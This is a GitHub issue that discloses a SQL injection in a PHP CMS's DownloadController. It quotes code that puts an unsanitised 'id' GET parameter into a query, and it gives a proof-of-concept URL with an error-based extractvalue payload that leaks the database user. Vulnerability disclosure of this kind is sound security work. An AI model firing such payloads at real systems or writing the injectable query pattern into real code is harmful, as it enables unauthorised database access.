Skip to content

\App\Manage\Controller\DownloadController.class.php has SQLinjection #8

Open
@maoqingya

Description

@maoqingya

\App\Manage\Controller\DownloadController.class.php
line: 18 - 21
public function index(){
//查询指定id的栏目信息
$id=I('get.id');//类别ID
$topcate=M('Column')->where("id=$id")->order('column_sort')->select();

POC:
http://127.0.0.1/index.php/Download/Index/Column?id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions